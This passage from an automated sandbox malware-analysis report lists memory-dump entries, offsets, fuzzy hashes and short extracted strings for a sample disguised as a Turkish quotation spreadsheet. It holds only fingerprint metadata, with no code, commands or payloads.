                                                                        • Source File: 00000000.00000002.1376731749.0000000001B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1b2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                        • Instruction ID: 4572567bee8a43c9045e222745626ee61200391e55c4008f22a41ab7b16e595a
                                                                        • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                        • Instruction Fuzzy Hash: 3D11BB75904280DFDB1ACF54D5C0B15FFA1FB85324F24CAA9D8494B696C33AD40ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad2e2338cbdb4058439d002f193aaaef215ea9f6d8e882b1dee21be3bc0fa835
                                                                        • Instruction ID: 1c9ee4ccf8068437716ff0500912830d6e26725df2dcc9b94d653d32d1f05f76
                                                                        • Opcode Fuzzy Hash: ad2e2338cbdb4058439d002f193aaaef215ea9f6d8e882b1dee21be3bc0fa835
                                                                        • Instruction Fuzzy Hash: 0201AC714043809AE7214A69CD84776BBE8DF81624F548559ED090E386C7759445CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376082963.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_163d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7353a63db8e4095d8a13094889f798d7908cd8eb5a3a24ceb9a39193751d002
                                                                        • Instruction ID: e100e157f1b75334aa03470637dfeb9be6cb3d3360e7225526e2ef144e8c1c1c
                                                                        • Opcode Fuzzy Hash: b7353a63db8e4095d8a13094889f798d7908cd8eb5a3a24ceb9a39193751d002
                                                                        • Instruction Fuzzy Hash: BBF06271404384AEE7258A5ADD84B62FFE8EF91724F18C55AED084F387C379A844CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8573d036b6df662797aaa640bee05a3e41bfca4fbdd2174a76c6af24c0d76d93
                                                                        • Instruction ID: d5b0b96eabd90b2166097c0ae2af501c50737cf44028339d7bb9c34dadd44541
                                                                        • Opcode Fuzzy Hash: 8573d036b6df662797aaa640bee05a3e41bfca4fbdd2174a76c6af24c0d76d93
                                                                        • Instruction Fuzzy Hash: 6CE1FAB4E0021A8FDB14DF99D580AAEFBF2FF89305F248159D815AB355D734A941CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e263e69802b7a888e7cd241b162f75e9fd8fd586e1241b9d5ef54e895bc74e1
                                                                        • Instruction ID: d3f030a79a3be733fc7791fd5a9e6b72b289dc9a49dcb1019877a2918310af27
                                                                        • Opcode Fuzzy Hash: 3e263e69802b7a888e7cd241b162f75e9fd8fd586e1241b9d5ef54e895bc74e1
                                                                        • Instruction Fuzzy Hash: 94E1F7B4E0021A8FDB14DFA9C580AAEFBB2FF89305F24C159D844AB355C735A941CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3acbc03863257d2e6430be12eb186b39d561e8de44cff1423a93ced11d51254
                                                                        • Instruction ID: 1b9eb5b2065ea098df56fa6d0f568bc3ad433b40a7f546323358176107445eda
                                                                        • Opcode Fuzzy Hash: b3acbc03863257d2e6430be12eb186b39d561e8de44cff1423a93ced11d51254
                                                                        • Instruction Fuzzy Hash: 8FE1E9B4E0021A8FDB14DF99C580AAEFBF6FF89305F248169D814AB355D735A941CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07371269f42dd8d0612f9c26bf0d33e89fa8e92e88a34be76bbc5c51be3841a8
                                                                        • Instruction ID: fadf652715ddce0286cfd015a8ac58695e9c40e0376a8f4b8a0e7720f92a9955
                                                                        • Opcode Fuzzy Hash: 07371269f42dd8d0612f9c26bf0d33e89fa8e92e88a34be76bbc5c51be3841a8
                                                                        • Instruction Fuzzy Hash: 7BE109B4E0025A8FDB14DFA9C590AAEFBF6FF89305F248159D804AB355C734A941CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 766f5ac5c8b790c079382b527520822b0a6b78400da81abb7ea3ccae28084a60
                                                                        • Instruction ID: 3bf56b147692d68512abf7553deedc254caef7a1f682b510bfbdfef47ca2a5a3
                                                                        • Opcode Fuzzy Hash: 766f5ac5c8b790c079382b527520822b0a6b78400da81abb7ea3ccae28084a60
                                                                        • Instruction Fuzzy Hash: 31E1E7B4E0021A8FDB14DF99C580AAEFBB2FF89305F24C159D814AB355DB35A941CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83d084f2b47aa75b5d6ddc61e272ca64996e6c60a1090fc875d743b2b8cd3469
                                                                        • Instruction ID: a4e2ebfa6660a56d52e2181154c3fc864753a0316ea49d630696965aa78a6409
                                                                        • Opcode Fuzzy Hash: 83d084f2b47aa75b5d6ddc61e272ca64996e6c60a1090fc875d743b2b8cd3469
                                                                        • Instruction Fuzzy Hash: B7A17136E003158FCF05DFB4D88459EB7B6FF8A300B1581A9E806AF265DB31EA56CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9361d90af07ee4a9001702bfb58e3bdfb86458735778b974fd6451c9e86ac493
                                                                        • Instruction ID: 29255a50f6101bf60a149dd6563d144520269b9ead331b7a30c55b7a6cc325be
                                                                        • Opcode Fuzzy Hash: 9361d90af07ee4a9001702bfb58e3bdfb86458735778b974fd6451c9e86ac493
                                                                        • Instruction Fuzzy Hash: C2510DB4E142198FDB14CFA9C5405AEFBF2BF89304F24C169D418AB355D7359941CFA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 1d8bca7d820713c0db94b5d04a495e9fae9353ea869aa3f17104fb8b6a9e4a8f
                                                                        • Instruction ID: 5dd3b4271116d5f80b0dc6881b69941917a9c8f7bb3aaa974b5540f14b7cdf1a
                                                                        • Opcode Fuzzy Hash: 1d8bca7d820713c0db94b5d04a495e9fae9353ea869aa3f17104fb8b6a9e4a8f
                                                                        • Instruction Fuzzy Hash: DFA1E775E00218CFDB14DFAAD984A9DBBF2BF89314F14906AE409BB361DB349942CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 808c30132767eecbf31dacd0f1cfc39151741e8f723901295ddf2d87fafacc92
                                                                        • Instruction ID: 419a053627efff043477919aeec0a66d8ba385807122b5dd40e0f586c7840a4f
                                                                        • Opcode Fuzzy Hash: 808c30132767eecbf31dacd0f1cfc39151741e8f723901295ddf2d87fafacc92
                                                                        • Instruction Fuzzy Hash: 5781B474E00218CFEB14DFAAD984A9DBBF2BF88314F14D06AE419AB365DB345941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 3ab59b34e318c2a72ab452ac38a9372a6b64eb407e93247a9fc5c97a0970c55b
                                                                        • Instruction ID: 0fedcc690e76ee369e2c62e79ef75545a5064f8f9ed9f92faa905143f84242bc
                                                                        • Opcode Fuzzy Hash: 3ab59b34e318c2a72ab452ac38a9372a6b64eb407e93247a9fc5c97a0970c55b
                                                                        • Instruction Fuzzy Hash: 9081C374E00218CFEB54DFAAD984A9DBBF2BF88314F14C169E809AB365DB349941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 3e7fab4fe1ec551b93c9e2603e3fd58d15a94c0ebfe721da138817ede191f18b
                                                                        • Instruction ID: 21cc4394d22d88c7a8df3e8adf5f98214da797808ec1f6b5d9dc9fc748a8bfc9
                                                                        • Opcode Fuzzy Hash: 3e7fab4fe1ec551b93c9e2603e3fd58d15a94c0ebfe721da138817ede191f18b
                                                                        • Instruction Fuzzy Hash: 8581B274E00218CFEB14DFAAD984A9DBBF2BF88314F14D16AE419AB365DB309941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: c631be3364d3671648f0247cff9d79d9a916a4228c4eed69efb164d10bbd1448
                                                                        • Instruction ID: 6e9dba72e8226b13fe6da06a54f70099663a22739fc064cb9e8ce4f72714938c
                                                                        • Opcode Fuzzy Hash: c631be3364d3671648f0247cff9d79d9a916a4228c4eed69efb164d10bbd1448
                                                                        • Instruction Fuzzy Hash: BC81C274E00218CFEB14DFAAD994A9DBBF2BF88304F14D06AE409AB365DB309945CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: e4a665a01307f8df5428e54a2e9e4f81f59ddb25f474e182273c2161ff352433
                                                                        • Instruction ID: ac154012e5656c91f9eecaac61abaf0d3ea1d96804e43b21dbe8429938f44678
                                                                        • Opcode Fuzzy Hash: e4a665a01307f8df5428e54a2e9e4f81f59ddb25f474e182273c2161ff352433
                                                                        • Instruction Fuzzy Hash: 6181B374E00218CFEB14DFAAD984A9DBBF2BF88314F14C169E819AB365DB349941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 5aad0e65abda2f4c296bc93354441374b72c807bc6eae0c3a063cb675fcca2ba
                                                                        • Instruction ID: 9c86b1418b7a77ebb631fc06db6cbac27915fbb2787f0d7fbcd135c9ffc806ad
                                                                        • Opcode Fuzzy Hash: 5aad0e65abda2f4c296bc93354441374b72c807bc6eae0c3a063cb675fcca2ba
                                                                        • Instruction Fuzzy Hash: D281A574E00218CFEB14DFAAD994A9DBBF2BF88304F14D06AE419AB365DB349941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oq$(oq$(oq
                                                                        • API String ID: 0-3376450984
                                                                        • Opcode ID: 608e9a83d5d8200d0f25f22ce809bf7dde9a6326f4e2e425ac4d90cb12b14901
                                                                        • Instruction ID: bccf6100f9d5f46f34f0f2ffa1ecce4d2632ead857dd653906614876d5254071
                                                                        • Opcode Fuzzy Hash: 608e9a83d5d8200d0f25f22ce809bf7dde9a6326f4e2e425ac4d90cb12b14901
                                                                        • Instruction Fuzzy Hash: 3F225FB0A00259DFDB15CF69C984AAEBBF6BF88318F158069E905EB361D734EC41CB54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$PHq$PHq
                                                                        • API String ID: 0-280325872
                                                                        • Opcode ID: 78488ae227a5370559ffb9bbcb62524646b26b2885b5c7f5790dbfb9971b9e05
                                                                        • Instruction ID: ed285ce221a68d299b74aeea6d9ccb2be753d98ac79f7245d5bc0945ddfde2f6
                                                                        • Opcode Fuzzy Hash: 78488ae227a5370559ffb9bbcb62524646b26b2885b5c7f5790dbfb9971b9e05
                                                                        • Instruction Fuzzy Hash: 0161A675E00218DFEB18DFAAD944A9DBBF2BF88300F14C169E819AB365DB345941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oq
                                                                        • API String ID: 0-1999159160
                                                                        • Opcode ID: e472830d4303d54c95cb3c55c6f987d01dd355f7dddc41500d4f3f6f38d4394f
                                                                        • Instruction ID: fb921248d0020861fcf95c6ad6bbbd30d8237823ee0ff95666e5e9b4916e5f57
                                                                        • Opcode Fuzzy Hash: e472830d4303d54c95cb3c55c6f987d01dd355f7dddc41500d4f3f6f38d4394f
                                                                        • Instruction Fuzzy Hash: EA028EB0A002199FDB14DF69D855BAEBBF6BFC8304F248119E506AB395DF309E41CB84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $q
                                                                        • API String ID: 0-1301096350
                                                                        • Opcode ID: 008b08b575d5406fc3285924e43e9e07ba9ff7b38b911f5e1b38315a5eaa243b
                                                                        • Instruction ID: efb98334bfd92143571d2984532fb2bca76602152fcb5aa07a159ad79894f77c
                                                                        • Opcode Fuzzy Hash: 008b08b575d5406fc3285924e43e9e07ba9ff7b38b911f5e1b38315a5eaa243b
                                                                        • Instruction Fuzzy Hash: AE919534B04218DBDB5CAB78985467FBBB7BFC8714B04861DD506EB394CE359C028B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: daff023afbcf6c23f3cc6077d7986e6e18933597f93b79d97a15f4d569d8ab87
                                                                        • Instruction ID: 72258597114701821726bbeee4e4b8f6fe6b90dce742a3323a99672a336be0e8
                                                                        • Opcode Fuzzy Hash: daff023afbcf6c23f3cc6077d7986e6e18933597f93b79d97a15f4d569d8ab87
                                                                        • Instruction Fuzzy Hash: EB02BE329147A48FCBA2CF38C4D0757BBB1FF8A318B5588EDD4419B926D735A811DB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eadaf029455f260a24bed8847dc6187285e43424fe7bc8407efc51c26ff6eca9
                                                                        • Instruction ID: f8d9728ec72952f45566107f386a48f100b2391ddb4c5ea2ac6725a665bddef8
                                                                        • Opcode Fuzzy Hash: eadaf029455f260a24bed8847dc6187285e43424fe7bc8407efc51c26ff6eca9
                                                                        • Instruction Fuzzy Hash: AAA1AE32A087A08BCF66CF38C9D57577FB1FF4722874884DDD4828A91AD6749800DB87
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad46d57652dcf14020c0c72fa71231d37547e6f8960f72c525ce1e84e0cc13df
                                                                        • Instruction ID: 6b953f13ce644d490eecb59ef1355e43667f700cb39f704678976c9307b0c66e
                                                                        • Opcode Fuzzy Hash: ad46d57652dcf14020c0c72fa71231d37547e6f8960f72c525ce1e84e0cc13df
                                                                        • Instruction Fuzzy Hash: A5518674E00218DFEB18DFAAD594A9DBBF2FF89300F248129E815AB365DB345842CF54
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12dea0264c4db5bd70ee13cdfa0d6e8cadeca83f4c92fafe6f6323eec98f08c1
                                                                        • Instruction ID: f4bfd7dbfeda36bb3bbd3af894f494b290272b65d6606fc74679e2b1a182da1d
                                                                        • Opcode Fuzzy Hash: 12dea0264c4db5bd70ee13cdfa0d6e8cadeca83f4c92fafe6f6323eec98f08c1
                                                                        • Instruction Fuzzy Hash: D851A774E00208DFEB19DFAAD494A9DBBB2FF89300F24C129E815AB365DB345842CF14
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oq$(oq$(oq$(oq$(oq$(oq
                                                                        • API String ID: 0-4267992933
                                                                        • Opcode ID: 80feac1a8a6c40c53dd4e2ee9815c91c6919ad5e21d114d1c5c1cc6a81fc35b8
                                                                        • Instruction ID: 27322d3fac6cf565a860f92e16336fb6038054379f0f4ded0870c635138ba1cc
                                                                        • Opcode Fuzzy Hash: 80feac1a8a6c40c53dd4e2ee9815c91c6919ad5e21d114d1c5c1cc6a81fc35b8
                                                                        • Instruction Fuzzy Hash: 45126A70A00249DFDB25CF69C884AAEBBF2FF88318F148559E9159B361D730ED41CB54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0oMp$LjMp$LjMp$PHq$PHq
                                                                        • API String ID: 0-3780208268
                                                                        • Opcode ID: 6203862095be61a3b365d2d3e31048ef1d9359af70a73a1b6ae79b9b120c19e6
                                                                        • Instruction ID: 12a1825bb6a455e98e6bcf77d1b2360d6211ddb7c1309230aa8f95e857c50600
                                                                        • Opcode Fuzzy Hash: 6203862095be61a3b365d2d3e31048ef1d9359af70a73a1b6ae79b9b120c19e6
                                                                        • Instruction Fuzzy Hash: D471C474E00218CFEB14DFA9D884A9DBBF2BF88304F158069E809AB361DB34A941CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $q$$q
                                                                        • API String ID: 0-3126353813
                                                                        • Opcode ID: 4f3002a4e1b3b4ca52ff2c0da5143fc66650e4dca66301339be2c20179d82b95
                                                                        • Instruction ID: cd74e343389b19c88463bff68f6ffdaf46478bdee59ec72a15cc92447eff99de
                                                                        • Opcode Fuzzy Hash: 4f3002a4e1b3b4ca52ff2c0da5143fc66650e4dca66301339be2c20179d82b95
                                                                        • Instruction Fuzzy Hash: 1F31B6303002158FDB369B6DE85463E7B6BFBC4718B1407DAF616CB296DB28CC448759
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'q$4'q
                                                                        • API String ID: 0-1467158625
                                                                        • Opcode ID: b8e46423e087405634a6520ec68ff9f7a2929193821e76e157b079e243e4fea5
                                                                        • Instruction ID: cbf4babbaa1bf3f9baf1f911522eb11dd8771d4ed88211248433e38b8dd03c96
                                                                        • Opcode Fuzzy Hash: b8e46423e087405634a6520ec68ff9f7a2929193821e76e157b079e243e4fea5
                                                                        • Instruction Fuzzy Hash: 54018B353003056FD7191EAE6854A7ABBDBEFC8364B148469B949C7351DD71CC119790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRq
                                                                        • API String ID: 0-3187445251
                                                                        • Opcode ID: 7a73baeb93620707143cd12197dc8337bbca1737dae2b964d5ecb8e04f9ab0f3
                                                                        • Instruction ID: e1a4d5d3fd1b01ae9f7ac38d392247ad4e2f8f1776681c81bb0550f972bb44b4
                                                                        • Opcode Fuzzy Hash: 7a73baeb93620707143cd12197dc8337bbca1737dae2b964d5ecb8e04f9ab0f3
                                                                        • Instruction Fuzzy Hash: FC52BA7890022ACFCB64EF65ED94B9DB7B6FB48305F1046A5E509AB358DB306D86CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oq
                                                                        • API String ID: 0-1999159160
                                                                        • Opcode ID: 4b6e350ec565b052e01f4876e4bd681cb40c09c5a100d1e779ee180a66e54f20
                                                                        • Instruction ID: 126884a6820a73e91065e05b4e2ece3bc4224ac9f89474dc278134f0f924c112
                                                                        • Opcode Fuzzy Hash: 4b6e350ec565b052e01f4876e4bd681cb40c09c5a100d1e779ee180a66e54f20
